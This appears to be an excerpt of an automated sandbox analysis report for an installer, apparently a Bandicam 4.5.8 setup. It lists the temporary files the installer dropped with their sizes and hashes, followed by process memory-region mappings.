                                                                        • C:\Users\Admin\AppData\Local\Temp\is-1CRVM.tmp\7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.tmp
                                                                          Filesize

                                                                          2.5MB

                                                                          MD5

                                                                          5cea51722c4aebe9322f76a27370d7d8

                                                                          SHA1

                                                                          1e479681b9a61d7f42ed349780f0ae93f477b4c8

                                                                          SHA256

                                                                          a1b1f6c621428e180248736534ac0d23531f50ecaceaadfe420fed026ecc45a0

                                                                          SHA512

                                                                          fb10d9fce508894624902fbc18318b7fcfa0310141e340060b715ba0b060cfb04ecc9489d65915e50df1c74c47ced74ee69f0a668febe4f460ec409b4dcf7d87

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-I0G0Q.tmp\b2p.dll
                                                                          Filesize

                                                                          22KB

                                                                          MD5

                                                                          ab35386487b343e3e82dbd2671ff9dab

                                                                          SHA1

                                                                          03591d07aea3309b631a7d3a6e20a92653e199b8

                                                                          SHA256

                                                                          c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

                                                                          SHA512

                                                                          b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-I0G0Q.tmp\botva2.dll
                                                                          Filesize

                                                                          37KB

                                                                          MD5

                                                                          67965a5957a61867d661f05ae1f4773e

                                                                          SHA1

                                                                          f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

                                                                          SHA256

                                                                          450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

                                                                          SHA512

                                                                          c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-I0G0Q.tmp\botva2.dll
                                                                          Filesize

                                                                          37KB

                                                                          MD5

                                                                          67965a5957a61867d661f05ae1f4773e

                                                                          SHA1

                                                                          f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

                                                                          SHA256

                                                                          450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

                                                                          SHA512

                                                                          c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-I0G0Q.tmp\iswin7logo.dll
                                                                          Filesize

                                                                          39KB

                                                                          MD5

                                                                          1ea948aad25ddd347d9b80bef6df9779

                                                                          SHA1

                                                                          0be971e67a6c3b1297e572d97c14f74b05dafed3

                                                                          SHA256

                                                                          30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

                                                                          SHA512

                                                                          f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-OMVIE.tmp\Bandicam.4.5.8.1673.tmp
                                                                          Filesize

                                                                          939KB

                                                                          MD5

                                                                          2624dd7f54b9132196ea129114ac9828

                                                                          SHA1

                                                                          50082f8b6e179fa509d1575fd4536abdcbf229fe

                                                                          SHA256

                                                                          9b92942e7066168d9b95fb9004abe21254b28a076ff1988bea781d75fc48276f

                                                                          SHA512

                                                                          fd07a56e7fd9289cc5e7ebd9b1185950a708ee5edd609be67d38be5364f549ff08014abfabd38b6df7bb223f9f9031f17a53c37614441ac37c2592e6df17b31e

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-UQ0OB.tmp\_isetup\_iscrypt.dll
                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          a69559718ab506675e907fe49deb71e9

                                                                          SHA1

                                                                          bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                          SHA256

                                                                          2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                          SHA512

                                                                          e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                        • memory/32-168-0x0000000000000000-mapping.dmp
                                                                        • memory/864-162-0x0000000000000000-mapping.dmp
                                                                        • memory/888-198-0x0000000000000000-mapping.dmp
                                                                        • memory/1032-154-0x0000000000000000-mapping.dmp
                                                                        • memory/1088-204-0x0000000000000000-mapping.dmp
                                                                        • memory/1296-157-0x0000000000000000-mapping.dmp
                                                                        • memory/1508-149-0x0000000000000000-mapping.dmp
                                                                        • memory/1620-158-0x0000000000000000-mapping.dmp
                                                                        • memory/1916-211-0x0000000000000000-mapping.dmp
                                                                        • memory/1928-212-0x0000000000000000-mapping.dmp
                                                                        • memory/2020-169-0x0000000000000000-mapping.dmp
                                                                        • memory/2200-132-0x0000000000000000-mapping.dmp
                                                                        • memory/2212-215-0x0000000000000000-mapping.dmp
                                                                        • memory/2264-146-0x0000000000000000-mapping.dmp
                                                                        • memory/2304-194-0x0000000000000000-mapping.dmp
                                                                        • memory/2604-206-0x0000000000000000-mapping.dmp
                                                                        • memory/2608-214-0x0000000000000000-mapping.dmp
                                                                        • memory/2708-202-0x0000000000000000-mapping.dmp
                                                                        • memory/2840-156-0x0000000000000000-mapping.dmp
                                                                        • memory/2884-155-0x0000000000000000-mapping.dmp
                                                                        • memory/2968-178-0x0000000000000000-mapping.dmp
                                                                        • memory/3152-210-0x0000000000000000-mapping.dmp
                                                                        • memory/3216-170-0x0000000000000000-mapping.dmp
                                                                        • memory/3264-205-0x0000000000000000-mapping.dmp
                                                                        • memory/3308-150-0x0000000000000000-mapping.dmp
                                                                        • memory/3484-147-0x0000000000000000-mapping.dmp
                                                                        • memory/3524-159-0x0000000000000000-mapping.dmp
                                                                        • memory/3552-130-0x0000000000400000-0x00000000004C7000-memory.dmp
                                                                          Filesize

                                                                          796KB

                                                                        • memory/3552-134-0x0000000000400000-0x00000000004C7000-memory.dmp
                                                                          Filesize

                                                                          796KB

                                                                        • memory/3628-219-0x0000000005EE0000-0x0000000005F72000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/3628-218-0x00000000063B0000-0x0000000006954000-memory.dmp
                                                                          Filesize

                                                                          5.6MB

                                                                        • memory/3628-196-0x0000000000000000-mapping.dmp
                                                                        • memory/3628-209-0x0000000000380000-0x00000000009C8000-memory.dmp
                                                                          Filesize

                                                                          6.3MB

                                                                        • memory/3628-207-0x0000000000380000-0x00000000009C8000-memory.dmp
                                                                          Filesize

                                                                          6.3MB

                                                                        • memory/3628-217-0x0000000073550000-0x00000000735D9000-memory.dmp
                                                                          Filesize

                                                                          548KB

                                                                        • memory/3744-192-0x0000000000000000-mapping.dmp
                                                                        • memory/3808-188-0x0000000000000000-mapping.dmp
                                                                        • memory/3860-213-0x0000000000000000-mapping.dmp
                                                                        • memory/3952-175-0x0000000000000000-mapping.dmp
                                                                        • memory/4008-222-0x0000000000000000-mapping.dmp
                                                                        • memory/4008-232-0x0000000000D90000-0x0000000000E23000-memory.dmp
                                                                          Filesize

                                                                          588KB

                                                                        • memory/4008-225-0x0000000000D90000-0x0000000000E23000-memory.dmp
                                                                          Filesize

                                                                          588KB

                                                                        • memory/4008-228-0x0000000000D90000-0x0000000000E23000-memory.dmp
                                                                          Filesize

                                                                          588KB

                                                                        • memory/4076-180-0x0000000000000000-mapping.dmp
                                                                        • memory/4080-152-0x0000000000000000-mapping.dmp
                                                                        • memory/4084-203-0x0000000000000000-mapping.dmp
                                                                        • memory/4196-173-0x0000000000000000-mapping.dmp
                                                                        • memory/4280-161-0x0000000000000000-mapping.dmp
                                                                        • memory/4448-166-0x0000000009690000-0x000000000969F000-memory.dmp
                                                                          Filesize

                                                                          60KB

                                                                        • memory/4448-144-0x0000000000000000-mapping.dmp
                                                                        • memory/4448-231-0x0000000074ED0000-0x0000000074EEB000-memory.dmp
                                                                          Filesize

                                                                          108KB

                                                                        • memory/4560-140-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                          Filesize

                                                                          120KB

                                                                        • memory/4560-151-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                          Filesize

                                                                          120KB

                                                                        • memory/4560-138-0x0000000000000000-mapping.dmp
                                                                        • memory/4712-153-0x0000000000000000-mapping.dmp
                                                                        • memory/4868-208-0x0000000000000000-mapping.dmp
                                                                        • memory/4896-199-0x0000000000000000-mapping.dmp
                                                                        • memory/5060-184-0x0000000000000000-mapping.dmp
                                                                        • memory/5080-171-0x0000000000000000-mapping.dmp
                                                                        • memory/5084-172-0x0000000000000000-mapping.dmp
                                                                        • memory/5092-136-0x0000000000000000-mapping.dmp